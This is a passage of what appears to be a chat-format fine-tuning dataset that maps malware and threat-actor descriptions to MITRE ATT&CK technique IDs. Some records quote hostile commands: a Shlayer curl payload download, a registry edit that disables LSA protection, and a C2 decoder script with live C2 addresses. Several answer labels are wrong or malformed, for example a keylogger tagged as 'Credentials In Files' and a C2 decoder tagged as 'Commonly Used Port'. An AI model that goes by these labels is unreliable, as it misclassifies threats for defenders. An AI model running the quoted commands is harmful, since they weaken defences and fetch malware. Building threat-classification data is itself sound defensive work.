- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can determine the current time."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To ensure its victim will use IE, it will terminate any process in-focus that is Chrome or Firefox, in hopes the victim will believe the browsers are “malfunctioning.” Whenever a victim uses IE and browses to specific Brazilian banks or businesses, the malware will only then begin to log keystrokes"
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QAKBOT can use VBS to download and execute malicious files"
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has harvested data from remote mailboxes including through execution of \"\\\\\\c$\\Users\\\\AppData\\Local\\Microsoft\\Outlook*.ost\"."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN4 has used Tor to log in to victims' email accounts."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LiteDuke has the ability to check for the presence of Kaspersky security software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tarrask leverages token theft to obtain `lsass.exe` security permissions."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Old Comnie Variant C2 Decoder 12345678910111213141516171819 import requestsimport sysimport redef decode(data): o = \"\" for c in data: if c == \"*\": o += \".\" elif c == \"|\": o += \":\" elif c == \"+\": o += \";\" else: o += chr(ord(c)-49) return or = requests.get(sys.argv[1])fd = r.textdata = fd.split(\"++a++\")[1].split(\"++a++\")[0]print(decode(data)) Samples Analyzed eed5945c36ba22a2531dd2d9dd7bc4e17e68544d512be75670919caf287c1b4a 8026442b812469e48ccd11611ab6eacdcb312a8f1aabd563b7f4cb4868315e16 c8951038fd53321661274e5a12532c3fb6f73c75fd75503a1089c56990658fef 48a1ce103e5bf47c47cc5ed40b2dc687ebaf3674d667419287bcb1d0b8d8dda6 e06b797a24fa03a77e0d5f11b0cf0f4f038e0a9ea04d4981d39148969349c79c 7282d0709449abe16457864f58157cac8d007571dc5d463d393d1ae2605d17e0 bf6ee8426245b167a69292e513c0841d818b310dda87daea649221f4e0afd1b3 62b98dde60cb4dd0d0088bde222c5c2c4c92560cccf4753f1ce94e044093ab85 756952652290ad09fe03c8674d44eab2077b091398187c3abcb6f1ddc462c32d 639a49390c6f8597d36ec0bd245efa1b4a078c0506fb515e577a40389b39a614 29ed6eb3c882b018c2bb6bf2f8eb15069dc5510ca119abebf24f09e3c91f10aa 0e8a4e4d5ca501bad25a730fb5de534fa324c6ac23e0a573524693f2d996d105 316a0c6849f183a1a52d0c7648e722c4ca85bd57b0804a147c0c8656b84bbdb9 Identified C2s 121.126.211[.]94:8080 113.196.70[.]11:80,8080 133.130.101[.]47:443 123.51.208[.]157:443;8000;8080 C2 Hosting URLs (DDR URLs) github[.]com/korlee5643 itsmonsee.tumblr[.]com allworldnewsway.blogspot[.]com"
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The WannaCry malware consists of two distinct components, one that provides ransomware functionality and a component used for propagation, which contains functionality to enable SMB exploitation capabilities"
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has loaded a plist file using the \"launchctl\" command."
- },
- {
- "role": "assistant",
- "content": "T1569.001 - System Services: Launchctl"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware, such as HAMMERTOSS."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea collects information about the Internet adapter configuration."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor's CovalentStealer tool stores collected files on a Microsoft OneDrive cloud folder."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanBot has been distributed within a malicious Excel attachment via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Octopus has uploaded stolen files and data from a victim's machine over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Socksbot can write and execute PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has sent spearphising emails with malicious attachments to potential victims using compromised and/or spoofed email accounts."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The vulnerability tracked as CVE-2022-41352 is a remote code execution flaw that allows attackers to send an email with a malicious archive attachment that plants a web shell in the ZCS server while, at the same time, bypassing antivirus checks."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell', 'T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire includes various modules for finding files of interest on hosts and network shares."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to decrypt and decompress its payload to enable code execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack uses a custom binary protocol over sockets for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pisloader uses DNS as its C2 protocol."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can sniff plaintext network credentials and use NBNS Spoofing to poison name services."
- },
- {
- "role": "assistant",
- "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The source code only considers the following machine types:default: lpString = \"(Other)\"; break;case 0x02: lpString = \"(Unknown)\"; break;case 0x03: lpString = \"(Desktop)\"; break;case 0x04: lpString = \"(Low Profile Desktop)\"; break;case 0x06: lpString = \"(Mini Tower)\"; break;case 0x07: lpString = \"(Tower)\"; break;case 0x08: lpString = \"(Portable)\"; break;case 0x09: lpString = \"(Laptop)\"; break;case 0x0A: lpString = \"(Notebook)\"; break;case 0x0E: lpString = \"(Sub Notebook)\"; break;The string format - with the () - and the considering types are exactly the same as those used in the ROKRAT samples.It's interesting to note that this reconnaissance phase was not included in the ROKRAT variant used during the \"Golden Time\" campaign.Brower StealerFor the first time, the ROKRAT sample used during the \"North Korean Human Rights\" contained a browser credentials stealer"
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels', 'T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Torisma has used various Windows API calls."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can use \"netstat\" to enumerate network connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Examining historical IP resolutions revealed a common IP between the active nameservers, 107.175.75[.]123"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a tool to capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX/Shlayer uses the command \"sh -c tail -c +1381...\" to extract bytes at an offset from a specified file. OSX/Shlayer uses the \"curl -fsL \"$url\" >$tmp_path\" command to download malicious payloads into a temporary directory."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 hijacked FQDNs associated with legitimate websites hosted by hop points."
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla can access the victim’s webcam and record video."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can persist by setting Registry key values \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic\" and \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DnsSystem can write itself to the Startup folder to gain persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY can gather system information such as computer names."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has used malware to collect information on network interfaces, including the MAC address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prikormka contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers file and directory information from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare can obtain the proxy settings of a compromised machine using `InternetQueryOptionA` and its IP address by running `nslookup myip.opendns.comresolver1.opendns.com\\r\\n`."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has exploited CVE-2021-36934 to escalate privileges on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can set its \"beacon\" payload to reach out to the C2 server on an arbitrary and random interval. In addition it will break large data sets into smaller chunks for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. This was probably done to avoid them being written to the file system"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers used the famous Mimikatz credential dumping tool as their main tool to obtain credentials including user passwords, NTLM hashes and Kerberos tickets. Mimikatz is a very popular tool and is detected by most antivirus vendors and other security products. Therefore, the attackers used over 10 different customized Mimikatz payloads, which were obfuscated and packed in a way that allowed them to evade antivirus detection"
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT uses RC4 and XOR to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware communicates through the use of events in Google Calendar."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When executed, the DLL drops and launches using a WinExec API call. This stage of the Valak malware uses a malicious JavaScript file with a random name that changes per execution"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to capture webcam video."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This parameter is used by the trojanized installer. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Consequently, the execution won't do anything and the dynamic analysis will be skewed. The second main feature is the service. This service has two features. First, it will launch the winprint32.exe executable (C2 contact module) and then it will wait for an event. This event is the mechanism used by the C2 contact module to alert the service executable to perform the cleaning of all components"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries can direct BACKSPACE to upload files to the C2 Server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb's loader can use API functions to load the FoggyWeb backdoor into the same Application Domain within which the legitimate AD FS managed code is executed."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has used Python-based implants to interact with compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Each message contains an attachment that loads the payload – part of Cobalt Strike software – to the computer's operating memory. In order to make this download possible, attackers have tried several different formats of attachments and emails, as their primary task is to bypass mail filters, protection measures, and the company's security policy. 3 Example of a message with an executable attachment (.exe) The archive is password-protected in order to bypass anti-virus scans, security systems, and mail filters. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ixeshe enumerates the IP address, network proxy settings, and domain name from a victim's system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attachedTemplate.dotm xxx 11/15/18 05:35 11/15/18 05:35 109.248.148[.]42 Table 2 Remote templates downloaded by Dear Joohn delivery documents As seen in Table 1, the delivery documents accessed their respective remote templates from four C2 servers at the following IP addresses: 185.203.118[.]198 145.249.105[.]165 188.241.58[.]170 109.248.148[.]42 These initial C2 IP addresses not only hosted the remote templates that subsequently load the first-stage Zebrocy or Cannon payloads, but the IP addresses also hosted the C2 server for the first-stage payloads themselves"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has disabled LSA protection on compromised hosts using `\"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v RunAsPPL /t REG_DWORD /d 0 /f`."
- },
- {
- "role": "assistant",
- "content": "T1562 - Impair Defenses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP over SSL to communicate commands with the control server."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom UDP protocol to communicate."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects local files and information from the victim’s local machine."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear can hook the \"ZwOpenProcess\" and \"GetExtendedTcpTable\" APIs called by the process of a security product to hide PIDs and TCP records from detection."
- },
- {
- "role": "assistant",
